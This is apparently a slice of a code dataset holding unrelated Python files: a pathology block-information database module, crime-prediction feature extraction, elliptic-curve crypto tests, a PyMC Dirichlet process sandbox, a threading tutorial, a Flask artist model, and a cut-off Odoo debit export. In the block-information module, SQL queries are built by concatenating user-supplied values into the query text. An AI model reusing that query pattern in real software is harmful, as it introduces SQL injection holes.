reports.ffpe_db_new import NewBlock\n\n\nclass BlockInformation:\n\n def __init__(self, conn, cursor, file_number):\n self.file_number = file_number\n self.cursor = cursor\n self.conn = conn\n self.table_name = 'block_list'\n\n def get_block_id(self, col_filter_value):\n block_columns = ['file_number'] + names.block_list('all')\n block_list = sql.extract_multiple_value_select_column(self.conn, block_columns, table=self.table_name,\n file_number=self.file_number, col_select='block_id',\n col_filter='block_type',\n col_filter_value=col_filter_value)\n block_id = ask.ask_list(str(col_filter_value) + ' block id information is to be entered for: ', block_list+\n ['not available', 'Other'])\n block_list = ask.flatten_nested_list(block_list)\n if block_id not in set(block_list):\n number_of_blocks = 'not available'\n else:\n number_of_blocks = sql.get_value(col_name='number_of_blocks', table='block_list', pk_name='file_number',\n pk=self.file_number, cursor=self.cursor, error_statement=\"Enter number of \"\n \"blocks: \")\n return str(block_id), str(number_of_blocks)\n\n def get_block_pk (self, user_name, col_filter_value, col_select='block_id', col_filter='block_type'):\n #retrieves a list of block_ids that correspond to a particular col_filter (block_type, file_number etc)\n new_block = NewBlock(self.conn, self.cursor, user_name)\n block_columns = ['file_number'] + names.block_list('all')\n block_list = sql.extract_multiple_value_select_column(self.conn, block_columns, self.table_name,\n self.file_number, col_select, col_filter,\n col_filter_value)\n block_id = ask.ask_list(str(col_filter_value) + ' block id information is to be entered for: ', block_list +\n ['not available', 'Other'])\n block_list = ask.flatten_nested_list(block_list)\n if block_id not in set(block_list):\n new_block.add_new_pk(self.file_number, block_type=col_filter_value)\n pk, number_of_blocks = self.get_block_information(block_id, block_data= ['pk', 'number_of_blocks'])\n else:\n sql_statement = (\"SELECT pk FROM block_list WHERE (block_id = '\" + block_id + \"')\")\n self.cursor.execute(sql_statement)\n pk_ = self.cursor.fetchall()\n pk = pk_[0][0]\n number_of_blocks = sql.get_value(col_name='number_of_blocks', table='block_list', pk_name='pk', pk=pk,\n cursor=self.cursor, error_statement=\"Enter number of blocks: \")\n return pk, str(block_id), number_of_blocks\n\n def get_block_information(self, block_id, block_data):\n if block_id == 'not available':\n search_col = 'file_number'\n search_val = self.file_number\n else:\n search_col = 'block_id'\n search_val = block_id\n sql_statement = (\"SELECT DISTINCT \" + ', '.join(block_data) + \" FROM block_list WHERE \" + search_col + \"= '\"\n + search_val + \"'\")\n df = pd.read_sql(sql_statement, self.conn)\n block_details = []\n for col in block_data:\n block_detail = list(pd.unique(df[col].values))\n if len(block_detail) > 1:\n detail = ask.ask_list('Please choose the correct ' + col + ': ', block_detail + ['not available'])\n block_detail = detail\n block_details.append(block_detail)\n return ask.flatten_nested_list(block_details)\n\n def margin_info(self):\n specimen_resection_size = input('Size of specimen (resection size): ')\n margins = ask.check_number_input('Please input number of resection margin sizes to be entered: ',\n 'Please only input number of margins not type')\n margin_size_df = pd.DataFrame(columns=['margin', 'size'])\n if margins != '0':\n for margin in range(0, int(margins)):\n margin_name = input('Name of margin: ')\n margin_distance = input('Margin Size: ')\n margin_size_df.loc[margin] = [margin_name, margin_distance]\n margin_size_df['margin_size_name'] = margin_size_df['margin'].str.cat(margin_size_df['size'], sep =\": \")\n margin_size = '|'.join(list(margin_size_df['margin_size_name']))\n else:\n margin_size = 'no_margins_described'\n cut_margins = ask.check_number_input('Please input number of cut (shave) margin sizes to be entered: ',\n 'Please only input number of margins not type')\n cut_margin_size_df = pd.DataFrame(columns=['cut_margin', 'size'])\n if cut_margins != '0':\n for cut_margin in range(0, int(cut_margins)):\n cut_margin_name = input('Name of cut_margin: ')\n cut_margin_distance = input('Cut Margin dimensions: ')\n cut_margin_size_df.loc[cut_margin] = [cut_margin_name, cut_margin_distance]\n cut_margin_size_df['cut_margin_size_name'] = cut_margin_size_df['cut_margin'].str.cat(\n cut_margin_size_df['size'], sep=\": \")\n cut_margin_size = '|'.join(list(cut_margin_size_df['cut_margin_size_name']))\n else:\n cut_margin_size = 'cut_margins_not_present'\n margin_report = input('Please input description of margins (involved/free/unremarkable etc as given in the report: ')\n return specimen_resection_size,margin_size,cut_margin_size, margin_report\n\n\n","repo_name":"shwetakadupccm/pccm_db_sk","sub_path":"reports/block_information.py","file_name":"block_information.py","file_ext":"py","file_size_in_byte":6159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21596305639","text":"import pandas as pd\nimport numpy as np\nfrom time import time\nimport matplotlib.pyplot as plt\n\nimport itertools, datetime, sys\n\nfrom sklearn import metrics\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.datasets.species_distributions import construct_grids\nfrom sklearn.neighbors import KernelDensity\nfrom sklearn import preprocessing\n\ndef get_normalizer(column):\n X = np.array(column).reshape(column.shape[0], 1)\n return preprocessing.Normalizer().fit(X)\n\ndef normalize(df, column_name):\n X = np.array(df[column_name]).reshape(df[column_name].shape[0], 1)\n return get_normalizer(df[column_name]).transform(X)\n\ndef get_scaler(column):\n X = np.array(column).reshape(column.shape[0], 1)\n return preprocessing.MinMaxScaler().fit(X)\n\ndef scale(df, column_name):\n X = np.array(df[column_name]).reshape(df[column_name].shape[0], 1)\n return get_scaler(df[column_name]).transform(X)\n\ndef normalize_columns(df, column_names):\n for column_name in column_names:\n df['%s_norm' % column_name] = normalize(df, column_name)\n \ndef scale_columns(df, column_names):\n for column_name in column_names:\n df['%s_scaled' % column_name] = scale(df, column_name)\n \ndef get_locations(df, metric='radians', drop_duplicates=True):\n if drop_duplicates:\n locations_df = df[['lat','long']].drop_duplicates()\n else:\n locations_df = df[['lat','long']]\n locations_array = np.vstack([locations_df['lat'],locations_df['long']]).T\n if metric == 'radians':\n locations_array *= np.pi / 180. # Convert lat/long to radians\n return locations_array\n\ndef get_kde(df, drop_duplicates=True, bandwidth=0.00025, rtol=1E-4):\n locations = get_locations(df, drop_duplicates=drop_duplicates)\n #KDE initialization\n kde = KernelDensity(bandwidth=bandwidth, metric='haversine', kernel='gaussian',\\\n algorithm='ball_tree', rtol=rtol, atol=5)\n #fit with given location\n# print(locations.shape, drop_duplicates)\n kde.fit(locations)\n return kde\n\ndef get_weights(df, kernel, metric='radians', lat_label='lat', long_label='long'):\n locations_array = np.vstack([df[lat_label], df[long_label]]).T\n if metric == 'radians':\n locations_array *= np.pi / 180. # Convert lat/long to radians\n if kernel == None:\n return None\n else:\n return np.exp(kernel.score_samples(locations_array))\n \ndef parse_location(loc):\n loc = loc.strip(\"()\").split(',')\n lat = loc[0].strip()\n long = loc[1].strip()\n return float(lat), float(long)\n\ndef parse_cell_range(loc):\n loc = loc.strip(\"()\").split('), (')\n ll = parse_location(loc[0].strip())\n ur = parse_location(loc[1].strip())\n return tuple(ll), tuple(ur)\n \ndef get_weather_data_for_year(year):\n weather_data = pd.read_csv(\"../data/PreProcessed_Weather_Data_%s.csv\"%year)\n weather_data.rename(columns={\"Weather_Date\":\"timestamp\"}, inplace=True)\n return weather_data\n\n \ndef get_spatio_temporal_features(grid_size):\n print(grid_size)\n yelp_df = pd.read_csv(\"../data/Yelp.csv\")\n police_df = pd.read_csv(\"../data/Police.csv\")\n crime_df = pd.read_csv(\"../data/final_Crime.csv\", parse_dates=['timestamp'])\n weather_df = get_weather_data_for_year(2016)\n\n print(\"Spatial\")\n df = pd.read_csv('../grids_full_year_%s.tsv'%grid_size, sep='\\t')\n df['lat'] = df.cell_range.apply(lambda x: (parse_cell_range(x)[0][0]+parse_cell_range(x)[1][0])/2)\n df['long'] = df.cell_range.apply(lambda x: (parse_cell_range(x)[0][1]+parse_cell_range(x)[1][1])/2)\n\n df['police_factor'] = get_weights(df, get_kde(police_df, bandwidth=0.0008))\n df['yelp_factor'] = get_weights(df, get_kde(yelp_df, bandwidth=0.0008, drop_duplicates=False))\n\n theft_kde = get_kde(crime_df[crime_df.ctype == \"theft\"][['lat','long']].reset_index(drop=True),\\\n bandwidth=0.0008, drop_duplicates=False)\n\n other_kde = get_kde(crime_df[crime_df.ctype == \"other\"][['lat','long']].reset_index(drop=True), \\\n bandwidth=0.0008, drop_duplicates=False)\n\n battery_kde = get_kde(crime_df[crime_df.ctype == \"battery\"][['lat','long']].reset_index(drop=True), \\\n bandwidth=0.0008, drop_duplicates=False)\n\n assault_kde = get_kde(crime_df[crime_df.ctype == \"assault\"][['lat','long']].reset_index(drop=True), \\\n bandwidth=0.0008, drop_duplicates=False)\n\n damage_kde = get_kde(crime_df[crime_df.ctype == \"damage\"][['lat','long']].reset_index(drop=True), \\\n bandwidth=0.0008, drop_duplicates=False)\n \n df['theft_factor'] = get_weights(df, theft_kde)\n df['other_factor'] = get_weights(df, other_kde)\n df['battery_factor'] = get_weights(df, battery_kde)\n df['assault_factor'] = get_weights(df, assault_kde)\n df['damage_factor'] = get_weights(df, damage_kde)\n\n crime_kde = get_kde(crime_df, bandwidth=0.0008, drop_duplicates=False)\n df['crime_factor'] = get_weights(df, crime_kde)\n\n df.to_csv('../data/spatial/spatial_features_full_year_%s.tsv'%grid_size, sep='\\t', index=False)\n \n print(\"Temporal\")\n df = df.groupby(by=['cell_range','timestamp']).sum()\n\n #get previous day\n df['prev_day_crime_freq'] = df['crime_freq'].shift(1)\n df['prev_day_theft_freq'] = df['theft'].shift(1)\n df['prev_day_other_freq'] = df['other'].shift(1)\n df['prev_day_battery_freq'] = df['battery'].shift(1)\n df['prev_day_assault_freq'] = df['assault'].shift(1)\n df['prev_day_damage_freq'] = df['damage'].shift(1)\n\n #get previous week\n\n temp1 = df[['crime_freq','theft', 'other', 'battery', 'assault', 'damage']].shift(1)\n temp2 = df[['crime_freq','theft', 'other', 'battery', 'assault', 'damage']].shift(2)\n temp3 = df[['crime_freq','theft', 'other', 'battery', 'assault', 'damage']].shift(3)\n temp4 = df[['crime_freq','theft', 'other', 'battery', 'assault', 'damage']].shift(4)\n temp5 = df[['crime_freq','theft', 'other', 'battery', 'assault', 'damage']].shift(5)\n temp6 = df[['crime_freq','theft', 'other', 'battery', 'assault', 'damage']].shift(6)\n temp7 = df[['crime_freq','theft', 'other', 'battery', 'assault', 'damage']].shift(7)\n \n df[['prev_7_days_crime_freq','prev_7_days_theft_freq','prev_7_days_other_freq',\\\n 'prev_7_days_battery_freq','prev_7_days_assault_freq','prev_7_days_damage_freq']] = (temp1+temp2+temp3+temp4+temp5+temp6+temp7)/7\n \n df.reset_index(drop=False, inplace=True)\n \n #remove NaN and set it back to normal index\n df = df[pd.to_datetime(df.timestamp) > datetime.date(2016,1,7)].reset_index(drop=True)\n\n df.to_csv('../data/spatio_temporal/spatial_temporal_features_full_year_%s.tsv'%grid_size, sep='\\t', index=False)\n \n \ngrid_size = int(sys.argv[1])\n\nget_spatio_temporal_features(grid_size)","repo_name":"prakritigupta/crime_prediction","sub_path":"src/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":6816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73450209107","text":"import unittest\nimport priv\nimport ec\nimport encrypt\nimport decrypt\nimport pub\nimport sys, os\nsys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), os.pardir)))\nfrom helpers import *\n\nclass crypoTests(unittest.TestCase):\n \n def test_point_encryption(self):\n \n m = ec.point(1,2,priv.A, priv.B, priv.prime)\n cipher = encrypt.encrypt(m, priv.base_point, priv.pub_raised_point)\n m2 = decrypt.decrypt(cipher, priv.exponent)\n \n self.assertEqual(m, m2)\n \n \n def test_full_encryption(self):\n \n text1 = \"all ignorance taboggens into know\"\n \n #import pdb; pdb.set_trace()\n points = encrypt.text_to_points(text1)\n cipher_points = encrypt.encrypt_text(text1)\n text2 = decrypt.decrypt_points(cipher_points)\n \n self.assertEqual(text1, text2)\n \n \n def test_num_to_point_one(self):\n \n p = pub.num_to_point(1)\n self.assertTrue(p.is_valid())\n \n \n def test_num_to_point_many(self):\n \"\"\"\n test that numbers get mapped to unique points\n \"\"\"\n card = 1000\n nums = range(card)\n \n points = [pub.num_to_point(num) for num in nums]\n \n self.assertEqual(len(set(points)), card)\n \n \n def test_num_to_point_to_num(self):\n \n for num in range(15*8)[::4]:\n p = pub.num_to_point(2**num)\n self.assertEqual(pub.point_to_num(p), 2**num)\n \n \n def test_text_to_nums_to_text(self):\n \n text = \"all ignorance jcaesoijfeioasjfeioasjfeioajf\"\n nums = text_to_nums(text)\n text2 = ''.join([num_to_chars(num) for num in nums])\n self.assertEqual(text, text2)\n \n \n def test_text_to_text(self):\n \n text = \"all ignorance toboggens \"\n \n points = encrypt.text_to_points(text)\n text2 = decrypt.points_to_text(points)\n \n self.assertEqual(text, text2)\n \n","repo_name":"ihoover/crypto","sub_path":"ecc/tests/test_crypt.py","file_name":"test_crypt.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15207165731","text":"__author__ = 'Anand Patil, anand.prabhakar.patil@gmail.com'\n\n\"\"\"\nDirichlet process classes:\n\n- DPRealization: A Dirichlet process realization. Based on stick-breaking representation,\n but step methods should use other representations.\n\n Attributes:\n - atoms: A list containing the atom locations.\n\n Methods:\n - rand(m): Returns m random values.\n - logp(x): A function returning the log-probability of x.\n\nDP: A stochastic valued as a DP realization.\n\nDPDraw: A stochastic distributed as a DP object's value.\n\nNeal cite: Markov chain random methods for Dirichlet process mixture models.\nAlso study up on Gibbs sampler.\n\nThis should all be written in Pyrex eventually. Many things are screaming for\noptimization. The C++ vector class would be helpful too but that would have\nto be swigged.\n\"\"\"\n\nimport numpy as np\nfrom copy import copy\nfrom pymc import *\n\n\n\ndef draws_to_atoms(draws):\n \"\"\"\n atoms, n = draws_to_atoms(draws)\n\n atoms is a list of the unique elements in draws,\n and n is a list of their corresponding multiplicities.\n\n Needs optimization badly I'm sure.\n \"\"\"\n atoms = []\n n = []\n for element in np.atleast_1d(draws):\n match=False\n for i in xrange(len(atoms)):\n if all(element == atoms[i]):\n n[i] += 1\n match=True\n break\n if not match:\n atoms.append(element)\n n.append(1)\n return atoms, n\n\n\n\ntry:\n\n import pylab as pl\n\n def plot_atoms(DPr):\n \"\"\"\n plot_atoms(DPr)\n\n Plots the atoms of DP realization DPr.\n Base measure must be over the real line.\n \"\"\"\n for pair in zip(DPr.atoms, DPr.n):\n plot([pair[0], pair[0]], [0,pair[1]], 'k-')\n\nexcept ImportError:\n pass\n\n\n\nclass DPRealization(object):\n \"\"\"\n A Dirichlet process realization. This is based on the stick-breaking representation\n rather than the Chinese restaurant process in order to provide a logp method. Step methods are\n free to use the Chinese restaurant process, though.\n\n Arguments:\n - basemeas: The base measure. Must be a function which, when called with argument n, returns a value.\n - nu: The whatever parameter.\n - draws (optional): DPRealization can be initialized conditional on previous draws.\n Useful for Gibbs sampling, maybe MH too.\n - basemeas_params: The parameters of the base measure.\n\n Methods:\n - rand(m): Returns m random values.\n - logp(x): Returns the log-probability of x.\n \"\"\"\n\n def __init__(self, basemeas_rand, nu, draws=[], **basemeas_params):\n\n # The base measure and its parameters.\n self.basemeas_rand = basemeas_rand\n self.basemeas_params = basemeas_params\n\n # The tightness parameter.\n self.nu = np.float(nu)\n\n if len(draws)>0:\n atoms, n = draws_to_atoms(draws)\n\n # The number of draws from each atom.\n self.n = n\n\n # The values of the atoms.\n self.atoms = atoms\n\n # Need to triple-check that this is OK!\n # The probability masses of the atoms.\n mass_sofar = rbeta(sum(n), nu)\n if len(n) > 1:\n self.mass = list((rdirichlet(n) * mass_sofar).squeeze())\n else:\n self.mass = [mass_sofar]\n self.mass_sofar = mass_sofar\n self.mass_prod = 1.\n for m in self.mass:\n self.mass_prod *= (1.-m)\n\n else:\n self.n = []\n self.atoms = []\n self.mass = []\n self.mass_sofar = 0.\n self.mass_prod = 1.\n\n def logp(self, value):\n \"\"\"\n F.logp(x)\n\n Returns the log of the probability mass assigned to x.\n Returns -Inf if x is not in self.atoms; this behavior is fine\n for continuous base distributions but incorrect for discrete.\n \"\"\"\n logp_out = 0.\n value = np.atleast_1d(value)\n for val_now in value:\n match=False\n for i in xrange(len(self.atoms)):\n if all(val_now == self.atoms[i]):\n logp_out += log(self.mass[i])\n match=True\n break\n if not match:\n return -Inf\n return logp_out\n\n def rand(self, m=1):\n \"\"\"\n F.rand(m=1)\n\n Returns m values from the random probability distribution.\n \"\"\"\n\n draws = np.empty(m, dtype=float)\n\n for i in xrange(m):\n\n\n # Draw from existing atoms\n if np.random.random() < self.mass_sofar:\n atom_index = int(flib.rcat(np.asarray(self.mass) / self.mass_sofar,0,1,1))\n new_draw = self.atoms[atom_index]\n self.n[atom_index] += 1\n\n # Make new atom\n else:\n\n new_draw = self.basemeas_rand(**self.basemeas_params)\n self.atoms.append(new_draw)\n\n self.n.append(1)\n\n new_mass = self.mass_prod * rbeta(1, self.nu)\n self.mass.append(new_mass)\n self.mass_prod *= 1.-new_mass\n self.mass_sofar += new_mass\n\n draws[i] = new_draw\n\n if m==1:\n draws = draws[0]\n return draws\n\n\n\n\nclass DP(Stochastic):\n \"\"\"\n value: A DP realization.\n\n Parents: 'alpha': concentration parameter, 'base': base probability distribution.\n Base parent must have random() and logp() methods (must be an actual distribution object).\n\n Should get intrinsic set of clusters. Step methods will update them with the children.\n A new value should be created conditional on the intrinsic clusters every time a parent is updated.\n \"\"\"\n def __init__(self,\n name,\n basemeas_rand,\n basemeas_logp,\n nu,\n doc=None,\n trace=True,\n value=None,\n cache_depth=2,\n plot=False,\n verbose=0,\n **basemeas_params):\n\n self.basemeas_logp = basemeas_logp\n self.basemeas_rand = basemeas_rand\n self.basemeas_params = basemeas_params\n\n parents = {}\n\n parents['basemeas_logp'] = basemeas_logp\n parents['basemeas_rand'] = basemeas_rand\n parents['basemeas_params'] = basemeas_params\n parents['nu'] = nu\n\n def dp_logp_fun(value, **parents):\n return 0.\n # raise ValueError, 'DPStochastic objects have no logp attribute'\n\n def dp_random_fun(basemeas_logp, basemeas_rand, nu, basemeas_params):\n return DPRealization(basemeas_rand, nu, **basemeas_params)\n\n # If value argument provided, read off intrinsic clusters.\n # If clusters argument provided, well store them.\n # If no clusters argument provided, propose from prior all over the place.\n\n Stochastic.__init__(self, logp=dp_logp_fun, random=dp_random_fun, doc=doc, name=name, parents=parents,\n trace=trace, value=value, dtype=np.object, rseed=True, observed=False, cache_depth=cache_depth,\n plot=plot, verbose=verbose)\n\n\n\n\nclass DPDraw(Stochastic):\n \"\"\"\n value: An array of values.\n\n May want to hide these in the step method,\n but many step methods need them so it's probably better to keep them here:\n N: length of value.\n N_clusters: number of clusters.\n clusters: values of clusters, length-N list.\n cluster_multiplicities: multiplicities of clusters.\n\n Note may want to make these things their own Stochastics, in case people want to have\n Deterministics etc. depending on them or to trace them.\n\n Parent: 'dist': a DPStochastic.\n\n logp: product of base logp evaluated on each cluster (each cluster appears only once\n regardless of multiplicity) plus some function of alpha and the number of clusters.\n \"\"\"\n def __init__( self,\n name,\n DP,\n N=1,\n doc=None,\n trace=True,\n observed=False,\n cache_depth=2,\n plot=True,\n verbose = 0):\n\n self.N = N\n\n def DP_logp_fun(value, dist):\n return dist.logp(value)\n\n def DP_random_fun(dist):\n return dist.rand(N)\n\n Stochastic.__init__(self,\n logp = DP_logp_fun,\n doc=doc,\n name=name,\n parents={'dist': DP},\n random = DP_random_fun,\n trace=trace,\n value=None,\n dtype=float,\n rseed=True,\n observed=observed,\n cache_depth=cache_depth,\n plot=plot,\n verbose = verbose)\n\n self.clusters = lam_dtrm('clusters',lambda draws=self: draws_to_atoms(draws))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nfrom numpy.testing import *\nfrom pylab import *\nclass test_DP(NumpyTestCase):\n\n def check_correspondence(self):\n x_d = linspace(-5.,5.,1000)\n dx = x_d[1] - x_d[0]\n nu = 10\n\n p = nu * dx/sqrt(2.*pi)*exp(-x_d**2)\n DP_approx = rdirichlet(p).squeeze()\n DP_approx = hstack((DP_approx, 1.-sum(DP_approx)))\n\n true_DP = DPRealization(rnormal, nu, mu=0,tau=1)\n true_DP.rand(1000)\n\n clf()\n subplot(2,1,1)\n plot(x_d, DP_approx,'k.',markersize=8)\n subplot(2,1,2)\n plot_atoms(true_DP)\n\n def check_draws(self):\n D = DPRealization(rnormal,100,mu=-10,tau=.1)\n draws = D.rand(1000)\n clf()\n hist(draws)\n\n def check_stochastics(self):\n S = DP('S', rnormal,normal_like, 100, mu=10, tau=.1)\n q = DPDraw('q', S, N=1000)\n clf()\n hist(q.value)\n\n\n\nif __name__=='__main__':\n NumpyTest().run()\n\n\"\"\"\nNote: If you could get a distribution for the multiplicities of the currently-\nfound clusters in a DP, could you give its children a logp attribute?\n\nThen you could do something like with the GP: give the DPStochastic an intrinsic\nset of clusters unrelated to its children, assess its logp using only its intrinsic\nclusters, etc.\n\nYes, you can easily do this. Give the DP object its intrinsic clusters, and let the\nstep methods treat those as the things that are really participating in the model\neven though from the user's perspective the entire DP is participating.\n\"\"\"\n\n# Old random method\n# val = []\n# N = len(self.atoms)\n#\n# # Initialize. Optimization 1: keep running sum.\n# if N>0:\n# sum_n = np.sum(self.n)\n# else:\n# sum_n = 0\n#\n# float_sumn = np.float(sum_n)\n#\n# for i in xrange(m):\n#\n# # Optimization 2: update cumulative sum on the fly.\n# self.tables = np.cumsum(self.n)\n#\n# # Maybe draw a new atom\n# if uniform() > float_sumn / (float_sumn+self.nu):\n# new_val = self.basemeas_rand(**self.basemeas_params)\n# self.atoms.append(new_val)\n# self.n.append(1)\n# N = N + 1\n#\n# # Otherwise draw from one of the existing algorithms\n# else:\n# # Optimization 3: Draw uniforms ahead of time.\n# # DON'T use the same uniform for checking new atom\n# # creation AND for finding which old atom to draw from,\n# # you'll introduce painful bias.\n#\n# unif = uniform() * float_sumn\n# for i in xrange(N):\n# if unif < self.tables[i]:\n# new_val = self.atoms[i]\n# self.n[i] = self.n[i]+1\n# break\n#\n# float_sumn = float_sumn + 1.\n# val.append(new_val)\n#\n# if m>1:\n# return array(val, dtype=float)\n# else:\n# return val[0]\n","repo_name":"matthew-brett/pymc","sub_path":"pymc/sandbox/DP/DP.py","file_name":"DP.py","file_ext":"py","file_size_in_byte":11854,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"15736361286","text":"import concurrent.futures\nimport time\n\n# Thread Pools: Collection of threads that can be reused for multiple tasks\n\ndef worker():\n print('starting work')\n time.sleep(2)\n print('Done')\n\npool = concurrent.futures.ThreadPoolExecutor(max_workers=2) # Maximum number of threads in this pool is 2\n\nfor _ in range(3): \n pool.submit(worker) # Because we are creating three instances but the max number of threads in this pool is two the worker function will be exectued a max of two times concurrently until one of the threrads completes its execution then that thread will be used to perform the task a third time\n\npool.shutdown() # similar to .join() this ensures all of the threads have completed their execution before the program continues\n\nprint('Main Thread Activated')","repo_name":"pranav142/Threading-Tutorial","sub_path":"Course_1/Threading-1-4.py","file_name":"Threading-1-4.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"522463804","text":"import datetime\nfrom sqlalchemy.orm import backref\nfrom models import Genre,Show\nfrom app import db, format_datetime\n\n\nclass Artist(db.Model):\n __tablename__ = 'Artist'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n city = db.Column(db.String(120))\n state = db.Column(db.String(120))\n phone = db.Column(db.String(120))\n genres = db.relationship(\n 'Genre', secondary=Genre.artist_genre_table, backref=db.backref('artists'))\n image_link = db.Column(db.String(500))\n website = db.Column(db.String(120))\n facebook_link = db.Column(db.String(200))\n seeking_venue = db.Column(db.Boolean, default=True)\n seeking_description = db.Column(db.String(300), default=\"\")\n shows = db.relationship('Show', backref='artist', lazy=True)\n\n def __repr__(self):\n return f''\n\n\ndef getArtists():\n data = []\n artists = Artist.query.all()\n\n for artist in artists:\n data.append({\n \"id\": artist.id,\n \"name\": artist.name\n })\n\n return data\n\n\ndef getArtist(id):\n artist = Artist.query.get(id)\n current_time = datetime.datetime.now()\n\n shows_upcoming = Show.Show.query.join(Artist).filter(Artist.id == id).filter(Show.Show.start_time > current_time)\n shows_past = Show.Show.query.join(Artist).filter(Artist.id == id).filter(Show.Show.start_time < current_time )\n \n upcoming_shows = []\n past_shows = []\n\n for shows in shows_upcoming:\n data = {\n \"venue_id\": shows.venue_id,\n \"venue_name\": shows.venue.name,\n \"venue_image_link\": shows.venue.image_link,\n \"start_time\": format_datetime(str(shows.start_time))\n }\n upcoming_shows.append(data)\n\n for shows in shows_past:\n data = {\n \"venue_id\": shows.venue_id,\n \"venue_name\": shows.venue.name,\n \"venue_image_link\": shows.venue.image_link,\n \"start_time\": format_datetime(str(shows.start_time))\n }\n past_shows.append(data)\n\n\n genres = [genre.name for genre in artist.genres]\n\n data = {\n \"id\": artist.id,\n \"name\": artist.name,\n \"genres\": genres,\n \"city\": artist.city,\n \"state\": artist.state,\n \"phone\": artist.phone,\n \"facebook_link\": artist.facebook_link,\n \"image_link\": artist.image_link,\n \"past_shows\": past_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows_count\": len(past_shows),\n \"upcoming_shows_count\": len(upcoming_shows)\n }\n return data\n\n\ndef getArtistS(search):\n artists = Artist.query.filter(Artist.name.ilike(f'%{search}%'))\n\n data = {\n \"count\": artists.count(),\n \"data\": artists\n }\n\n return data\n\n\ndef editArtist(id, name, phone, state, city, genres, image, facebook):\n status = False\n try:\n artist = Artist.query.get(id)\n artist.name = name\n artist.phone = phone\n artist.state = state\n artist.city = city\n artist.image_link = image\n artist.facebook_link = facebook\n db.session.commit()\n status = True\n\n artist.genres = []\n\n # Checking if the genre exists if not creating it.\n for genre in genres:\n IsGenre = Genre.Genre.query.filter_by(name=genre).one_or_none()\n if IsGenre:\n artist.genres.append(IsGenre)\n else:\n Genre.Genre.addGenre(genre)\n artist.genres.append(IsGenre)\n except:\n db.session.rollback()\n\n finally:\n db.session.close()\n return status\n\n\ndef addArtist(name, phone, state, city, genres, image, facebook, seeking_venue, seeking_description, website):\n status = False\n print(name, phone, state, city, genres, image, facebook,\n seeking_venue, seeking_description, website)\n try:\n\n artist = Artist(\n name=name,\n city=city,\n state=state,\n phone=phone,\n seeking_venue=seeking_venue,\n seeking_description=seeking_description,\n\n website=website,\n image_link=image,\n facebook_link=facebook)\n\n print(genres)\n for genre in genres:\n IsGenre = Genre.Genre.query.filter_by(name=genre).one_or_none()\n\n if IsGenre:\n\n artist.genres.append(IsGenre)\n\n else:\n newGenre = Genre.Genre(name=genre)\n print(newGenre.name)\n db.session.add(newGenre)\n artist.genres.append(newGenre)\n\n db.session.add(artist)\n db.session.commit()\n status = True\n\n except:\n db.session.rollback()\n finally:\n db.session.close()\n return status\n\n\ndef removeArtist(id):\n status = False\n try:\n artist = Artist.query.get(id)\n db.session.delete(artist)\n db.session.commit()\n status = True\n except:\n db.session.rollback()\n finally:\n db.session.close()\n return status\n","repo_name":"Azees12/Udacity","sub_path":"Project 1 (Fyyur)/models/Artist.py","file_name":"Artist.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38724808069","text":"# -*- coding: utf-8 -*-\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).\n\nfrom odoo import api, fields, models\nfrom odoo.exceptions import ValidationError, UserError\nfrom odoo.tools.translate import _\n\nimport re\nimport datetime\nfrom pandas.tseries.offsets import BDay\nimport base64\nfrom uuid import uuid4\nimport logging\n_logger = logging.getLogger(__name__)\n\n\nclass ExportDirectDebitWizard(models.TransientModel):\n _inherit = 'export.direct.debit.wizard'\n _description = \"export.direct.debit.wizard\"\n\n def file_save(self):\n res = super(ExportDirectDebitWizard, self).file_save()\n if self.payment_acquirer_id.provider == 'rlpagar': # Debitos Red Link Pagar\n self.red_link_pagar_refresh_file_generator()\n return res\n\n def red_link_pagar_refresh_file_generator(self):\n # Registro Datos\n registry = {}\n total = 0.0\n count = 0\n\n for invoice_id in self._context['active_ids']:\n invoice = self.env['account.move'].search(\n [('id', '=', invoice_id)])\n\n if invoice.state == 'posted' and invoice.partner_id.customer_payment_mode_id == self.payment_mode_id:\n if not invoice.partner_id.vat:\n raise UserError(\"Error: El cliente %s de la factura %s no tiene DNI o CUIT asociado!!!\" % (\n invoice.partner_id.name, invoice.name))\n vat_number = invoice.partner_id.vat\n if vat_number not in registry:\n registry[vat_number] = {}\n\n registry[vat_number]['%s' % (invoice_id)] = {\n 'amount_residual': invoice.amount_residual,\n 'currency_id': invoice.currency_id.id,\n 'imputation_date': self.file_date + BDay(self.imputation_business_days),\n 'document_number': invoice.l10n_latam_document_number,\n 'vat': \"0\" if not invoice.partner_id.vat else invoice.partner_id.vat,\n 'partner_id': invoice.partner_id.id,\n 'partner_name': invoice.partner_id.name,\n 'partner_country_id': invoice.partner_id.country_id.id,\n 'partner_ref': invoice.partner_id.ref,\n 'company_name': self.env.user.company_id.name,\n 'date': self.file_date,\n }\n\n refresh_initial_registry = ''\n # Refresh Registro Inicial\n # 1 - Identificación del registro - tipo: alfanumérico - long.: 13 - decimales: 0\n refresh_initial_registry += \"HRFACTURACION\"[:13]\n # 2 - Código de Ente - tipo: alfanumérico - long.: 3 - decimales: 0\n refresh_initial_registry += self.payment_acquirer_id.red_link_company[:3]\n # 3 - Fecha de Proceso - tipo: numérico - long.: 6 - decimales: 0\n refresh_initial_registry += self.file_date.strftime(\"%y%m%d\")[:6]\n # 4 - Lote - tipo: numérico - long.: 5 - decimales: 0\n refresh_initial_registry += str(self.file_number).rjust(5, \"0\")[:5]\n # 5 - Filler - tipo: alfanumérico - long.: 104 - decimales: 0\n refresh_initial_registry += ' '.ljust(104, \" \")[:104]\n refresh_initial_registry 